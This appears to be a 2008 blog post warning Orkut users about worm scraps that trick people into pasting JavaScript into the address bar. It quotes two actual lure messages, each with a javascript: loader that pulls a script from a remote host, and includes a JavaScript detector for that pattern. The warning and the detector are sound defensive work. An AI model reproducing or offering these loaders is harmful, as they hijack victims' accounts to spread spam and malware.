Thursday, February 07, 2008

Lots of malicious JavaScripts are at work in Orkut - sending scraps to all your friends without your knowledge!

You might have already come across a scrap or message on Orkut instructing you to copy a link into your address bar and run it (by hitting ENTER). I agree that there are many harmless, useful scripts, like the most common 'Send Scraps to All' type. But please don't run one unless you are cent per cent sure that it is safe, because it is highly probable that it is a trick to compromise or infect your computer. Most of these scraps are the result of activity by malicious code or virus-like entities. These scraps are capable of modifying and deleting themselves, and of adding you to some Orkut community.

Many of you have likely received scraps that appeared to come from friends but that they never actually sent, and your friends may have received scraps that appeared to come from you!

Two examples of such scraps are given below:

Example 1:

"Here are some amazing tricks to make your cell phone battery last longer. It worked for Me. Just copy the JavaScript, paste it in your Address bar (the place where u see www.orkut.com) and hit ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c)
;c.src='http://userscripts.googlepages.com/news.user.js';void(0)

Trust me, you'll find this newsletter informative!
And If U Like it..You can even Go Here for More Tricks."


Example 2:

"Here are some cool pic..BY XXXXX.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c)
;c.src='http://tricks80.googlepages.com/20885.user.js';void(0)

trust me, you'll find thispic funny!"

The first example also links to an Orkut community and asks you to join it.
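
Both scraps use the same loader: a javascript: URI that creates a script element and sets its src to a remotely hosted file. As an added example (not code from the original post), the following check flags that pattern in scrap text without running it; the function name inspectScrap, the verdict labels and the regular expressions are assumptions made for illustration.

```javascript
// Added example: classify scrap text by the loader pattern in the samples above.
// The scrap is only inspected as a string; nothing in it is evaluated or fetched.

// A javascript: URI plus wrapped continuation lines, up to the first blank line.
const JS_URI = /javascript:((?:[^\n]|\n(?!\s*\n))*)/gi;
// The lure that accompanies the code: "copy ... paste it in your address bar".
const LURE = /(copy|paste)[\s\S]{0,80}address[\s-]?bar/i;

function inspectScrap(text) {
  const finding = { verdict: 'ok', lure: LURE.test(text), remoteScripts: [] };
  let sawJsUri = false;
  for (const m of text.matchAll(JS_URI)) {
    sawJsUri = true;
    const code = m[1].replace(/\s+/g, ''); // undo the line wrapping
    // Loader = creates a <script> element and points its src at a remote URL.
    if (!/createElement\(['"]script['"]\)/i.test(code)) continue;
    for (const s of code.matchAll(/\.src=['"](https?:\/\/[^'"]+)['"]/gi)) {
      finding.remoteScripts.push(s[1]);
    }
  }
  if (finding.remoteScripts.length > 0) finding.verdict = 'block';
  else if (sawJsUri || finding.lure) finding.verdict = 'review';
  return finding;
}

// Abridged from Example 1 on this page, including its mid-statement line break.
const SAMPLE_WORM =
  "Just copy the JavaScript, paste it in your Address bar and hit ENTER\n\n" +
  "javascript:d=document;c=d.createElement('script');d.body.appendChild(c)\n" +
  ";c.src='http://userscripts.googlepages.com/news.user.js';void(0)\n\n" +
  "Trust me, you'll find this newsletter informative!";
// Constructed samples: an ordinary scrap, and a javascript: URI with no loader.
const SAMPLE_BENIGN = "Nice photos from the trip, will call you tonight.";
const SAMPLE_PLAIN_JS = "Paste this in your address bar: javascript:alert(document.title)";

for (const s of [SAMPLE_WORM, SAMPLE_BENIGN, SAMPLE_PLAIN_JS]) {
  console.log(inspectScrap(s));
}
```

A 'block' verdict means the scrap carries a remote script loader; 'review' means it only contains a javascript: URI or the address-bar lure.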


Recently I got some scraps mimicking a YouTube video showing something vague, just to ignite our curiosity and make you click on it with the intention of viewing the video. But it is actually a picture, not a Flash video. The picture is linked to a problematic website hosting a Trojan named Infostealer.Orcu. You will realize something is wrong only after clicking the picture! One such picture is given below.



A picture mimicking a YouTube Flash video


Usually such scraps will also have something written purposefully in Portuguese, something like "Olha so que encontrei Varios flagras no BBB8 vc vai pira". This worm, named MW.Orc, primarily targets Brazilian users of Google's Orkut website.

But you can check whether it is a picture or a genuine Flash movie before clicking it. Just right-click it: if you see the Flash Player shortcut menu, it is a genuine Flash video; if you see a shortcut menu containing "Save Picture As..." or "Properties", it is a picture.

Try this for yourself with the two pictures given below...one is a real flash video from YouTube and the other is just a picture of it linked to this blog!










Alternatively, place your pointer over the picture and check the status bar at the bottom left of your browser. If you see a link there, it is a picture linked to some other site. Make it a habit: ALWAYS CHECK THE DESTINATION OF THE LINK AT THE LEFTMOST BOTTOM OF THE STATUS BAR IN YOUR BROWSER. But the link display in the status bar can be blocked by some scripts, so this method may not always be reliable.


This malicious code can send a scrap to all your friends while you are logged on to Orkut, without your knowledge! When a friend sees such a scrap from you in their scrapbook, he or she will click or run it without a second thought, since it is from you and they have full trust in you! And if your friend falls prey to this prank, it sends the same scrap to all the friends in their list. This is how it spreads, and it is now clogging the Orkut community. Some sites refer to this as an Orkut worm or XSS worm. It exploits XSS vulnerabilities in code created by Google webmasters. This is something like a reincarnation of spam or junk e-mail in Orkut!


So how to tackle it? DO NOT EXECUTE THE CODE OR CLICK ON THE LINK.....DELETE IT AS SOON AS YOU SEE IT.


Interestingly, many of these spam scripts are hosted on Google Pages, a free hosting service from Google! Orkut is a social network from Google, and it is being hacked with Google's own resources! I hope people at Google and Orkut will come forward with a permanent fix for this.
